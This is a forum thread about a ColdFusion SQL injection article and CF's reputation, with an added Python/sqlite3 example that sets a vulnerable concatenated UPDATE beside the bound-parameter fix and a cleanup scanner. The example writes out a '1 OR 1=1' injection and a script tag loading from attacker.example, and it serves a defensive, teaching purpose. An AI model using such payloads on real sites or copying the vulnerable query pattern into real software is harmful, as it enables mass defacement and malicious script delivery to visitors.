SQL Injection Part II? It's a textbook example of SQL injection. I guess it's interesting if you haven't seen one before, but this isn't some new and more evil version of an old attack. It's just the same old attack that's been around since the beginning of SQL-backed applications. The moral of the story is to always validate user input.
All these examples are in ColdFusion, and for many years (going back at least 5 years ago when I used it) CF developers have known to use <cfqueryparam> to pass user data to queries. It's the CF equivalent of binding parameters to a query. Every example presented here can easily be protected against using that method.
The only people that have to worry about this are the laziest of the lazy developers.
Sigh. Just use parameterized SQL statements. It's really really really not rocket science. If your language/framework doesn't support them, don't use that language/framework.
Sigh, I had really hoped we had gotten past this ColdFusion bashing. CF has an easy barrier to entry, so there's a mix of code from poor to excellent.
Lots of open source people bash CF because it's a commercial product. Well, in October that's about to change in a big way.
Railo will become the newest member of the JBoss project. There will now be a version of CFML with an LGPL2 license.
PG always celebrates time to market and CFML will quite simply get a startup there faster.
I got hit with this very same attack over July 4th weekend. I inherited an abortion of a site written in "classic" ASP. The attacker inserted JavaScript links into every VARCHAR database table it could. It took me hours to clean out everything. It's taking me even longer to go through and validate all the form posts.
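The two things the comments above describe, the textbook injection that lands a script tag in every row of a string column and the bound-parameter version of the same statement (what <cfqueryparam> does in CF), as an added example that is not code from the original thread. It is written in Python with sqlite3 rather than ColdFusion or classic ASP; the products table, the rows in it and the attacker.example payload are constructed for the demonstration, and the cleanup scanner at the end reflects the "clean out every VARCHAR column" chore the classic-ASP comment mentions.

```python
"""Textbook SQL injection beside the parameter-binding fix, plus a scan and
cleanup for the injected <script> tags. Added example (Python/sqlite3); the
thread's own examples are ColdFusion and classic ASP. All data is constructed."""
import sqlite3

# Constructed payload in the style of the mass-injection attacks the thread
# describes: a script tag stuffed into string columns site-wide.
SCRIPT_TAG = '<script src="http://attacker.example/x.js"></script>'


def make_db():
    """Fresh in-memory database with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, "
        "name VARCHAR(100), descr VARCHAR(200), price REAL)"
    )
    conn.executemany(
        "INSERT INTO products (name, descr, price) VALUES (?, ?, ?)",
        [("Widget", "A small widget", 9.99),
         ("Gadget", "A useful gadget", 19.99),
         ("Gizmo", "A shiny gizmo", 29.99)],
    )
    conn.commit()
    return conn


def update_descr_vulnerable(conn, product_id, descr):
    """String concatenation, the pattern behind the thread's ASP/CF examples.
    Both inputs become part of the SQL text, so the WHERE clause is whatever
    the caller sends: product_id = "1 OR 1=1" rewrites every row.
    Returns the number of rows changed."""
    sql = ("UPDATE products SET descr = '" + descr + "' "
           "WHERE id = " + product_id)
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def update_descr_bound(conn, product_id, descr):
    """Same statement with bound parameters (the cfqueryparam equivalent).
    The driver ships SQL and values separately, so a value can never change
    the statement's structure: "1 OR 1=1" is just a string that matches no
    integer id, and a quote in descr is stored literally.
    Returns the number of rows changed."""
    cur = conn.execute(
        "UPDATE products SET descr = ? WHERE id = ?", (descr, product_id)
    )
    conn.commit()
    return cur.rowcount


def find_tainted_rows(conn, table, marker="<script"):
    """Cleanup aid for the 'script tags in every VARCHAR column' scenario:
    list every text-typed column of `table` and count rows holding `marker`.
    Table and column names come from the schema (PRAGMA table_info), never
    from user input, which is why they are interpolated; the marker is bound."""
    cols = []
    for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
        ctype = (ctype or "").upper()
        if "CHAR" in ctype or "TEXT" in ctype:
            cols.append(name)
    hits = {}
    for col in cols:
        row = conn.execute(
            f'SELECT COUNT(*) FROM "{table}" WHERE "{col}" LIKE ?',
            ("%" + marker + "%",),
        ).fetchone()
        hits[col] = row[0]
    return hits


def strip_payload(conn, table, payload):
    """Remove one known payload from every text column that contains it.
    The payload is bound as a value to REPLACE(), so cleaning the injection
    does not itself reintroduce one. Returns the per-column counts cleaned."""
    hits = find_tainted_rows(conn, table, payload)
    for col, count in hits.items():
        if count:
            conn.execute(
                f'UPDATE "{table}" SET "{col}" = REPLACE("{col}", ?, ?)',
                (payload, ""),
            )
    conn.commit()
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable rows changed:", update_descr_vulnerable(db, "1 OR 1=1", SCRIPT_TAG))
    print("tainted:", find_tainted_rows(db, "products"))
    print("cleaned:", strip_payload(db, "products", SCRIPT_TAG))
    db = make_db()
    print("bound rows changed:", update_descr_bound(db, "1 OR 1=1", SCRIPT_TAG))
```

The scanner keys off the declared column type, which is enough for the VARCHAR/TEXT columns the comment is talking about; on a real SQL Server or MySQL schema the same idea reads INFORMATION_SCHEMA.COLUMNS instead of PRAGMA table_info. Note that the bound version stops the injection without any input validation at all; validating that product_id is an integer is still worth doing, but it is a second line of defence, not the one that makes the query safe.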
People complain you ought to need a license to have a kid. This kind of crap makes me think you need a license to write a web app.
It's not the fact that the examples are in ColdFusion that makes this article mostly irrelevant. To suggest that it does really just makes you sound ignorant, especially since the particular attack being demonstrated is not language specific.
ColdFusion isn't the best language, but it's certainly not one of the worst either. I think the poor reputation mostly stems from complaints about the joe-schmoe-friendly tag-based syntax and the fact that it's commercial, but most of these probably come from people who have never even used it. I spent some time with it and there are some pretty nifty things you can do with it. The fact that it's built on Java is nice too, since you can leverage the entire Java standard library and run on all the so-called enterprise-y application servers, all without the pain of having to use Java. This leads to rapid, corporate-friendly development, which makes developers and PHBs happy. That's probably why there are still lots of businesses out there using it.
MySpace is the largest CF site I'm aware of. I think they actually use the BlueDragon flavor of CF, or at least they did at one time. Most people haven't heard of it, but there's actually another implementation besides the one from Adobe. I remember some talk about MySpace being ported to .NET, but I still see a bunch of .cfm URLs on there, so I'm not sure what they're doing.
I don't know what you mean by that security remark. You can develop secure applications in CF just like you can with any other language. Some languages might require some more hoop jumping than others (example: protecting against SQL injection in PHP was a real drag for a long time), but I'm not aware of anything inherent in CF that makes it particularly difficult. In fact, I've found that many things tend to be easier in CF.
Don't get me wrong, I'm not saying everyone should go out and learn ColdFusion. I just think it may be undeserving of the snide comments it seems to attract.
Well, my company funds itself by, amongst other things, going out and breaking web apps, and I'm going to assert without evidence that in both code quality and in environmental security (admin interfaces, etc), CF sites rank at the bottom, and .NET and J2EE sites are neck and neck at the top.
We're a Rails product shop and our dev team is recovering Lisp hippies, so that's not a BigCo bias, it's just the empirical observation.
I won't dispute your results, but those alone are insufficient evidence to suggest any correlation between languages and the ability to develop secure applications. It's a huge leap to say that ApplicationX, developed in Blub++, has more bugs than some completely different application developed in another language, therefore Blub++ is an insecure language.
More likely, the correlation is between security and a number of factors far from choice of language, such as developer experience, diversity of the development team, budget, etc.
Based on my own experience, I've seen that many CF developers are typically less experienced and work in smaller shops, so those results aren't the least bit surprising. It's important to keep in mind that they say far more about the developers than about the language the application was developed in.